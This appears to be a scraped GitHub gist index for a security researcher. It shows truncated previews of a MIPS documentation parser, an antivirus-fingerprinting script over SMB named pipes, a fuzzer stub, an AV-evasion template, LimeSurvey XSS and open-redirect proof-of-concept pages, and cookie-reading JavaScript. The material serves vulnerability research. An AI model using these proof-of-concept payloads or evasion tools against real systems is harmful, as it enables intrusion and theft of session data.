I hereby claim:
- I am marpie on github.
- I am marpie (https://keybase.io/marpie) on keybase.
- I have a public key ASDMPdUbr0Dy9WjOZfqFtSGOWakasogF2SwZxpv14XMv6wo
To claim this, I am signing this object:
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
""" parseMIPSpdf.py | |
Uses PyPDF2 to parse the MIPS Instruction documentation and creates | |
a Ghidra compatible idx. | |
PDF Sources: | |
https://s3-eu-west-1.amazonaws.com/downloads-mips/documents/MD00087-2B-MIPS64BIS-AFP-6.06.pdf |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
""" smb4av.py | |
smb4av uses NamedPipe calls to determine | |
the running AntiVirus of the target. | |
Credits: @EquationGroup @ShadowBrokers | |
Author: marpie ([email protected]) |
import sqlite3 | |
import contextlib | |
import os | |
import sys | |
def clean_binja_snapshots(conn, limit = 1): | |
with conn as cur: | |
for section in [ 'snapshot', 'file_data' ]: | |
cur.execute(f'DELETE FROM {section} WHERE id NOT IN (SELECT id FROM {section} ORDER BY id DESC LIMIT ?)', (limit,)) |
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env python | |
import sys | |
import time | |
from boofuzz import \ | |
pedrpc, \ | |
s_binary, \ | |
s_block_end, \ | |
s_block_start, \ | |
s_delim, \ |
<html> | |
<head><title>poc: XSS Injection (reload saved survey)</title></head> | |
<body> | |
<img src="https://limesurvey/index.php?sid=51928" border=0 onerror="done();"> | |
<script> | |
function done() { | |
document.forms["xssme"].submit(); | |
} | |
</script> | |
<form id="xssme" action="https://limesurvey/index.php" method="POST"> |
<html> | |
<head><title>poc: Arbitrary URL redirect (move=clearall)</title></head> | |
<body> | |
<img src="https://limesurvey/index.php?sid=51928" border=0 onerror="done();"> | |
<script> | |
function done() { | |
window.location = "https://limesurvey/index.php?sid=51928&move=clearall&lang=de&redirect=http://www.google.de"; | |
} | |
</script> | |
</body> |
<?php | |
phpinfo(); | |
?> |
document.write ("This is remote text via JavaScript located at github.com: Cookie: " + document.cookie); | |
alert ("This is remote text via JavaScript located at github.com: Cookie: " + document.cookie); |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
""" peEvade | |
TEMPLATE Description | |
Author: marpie ([email protected]) | |
Last Update: 20120531 | |
Created: 20120530 |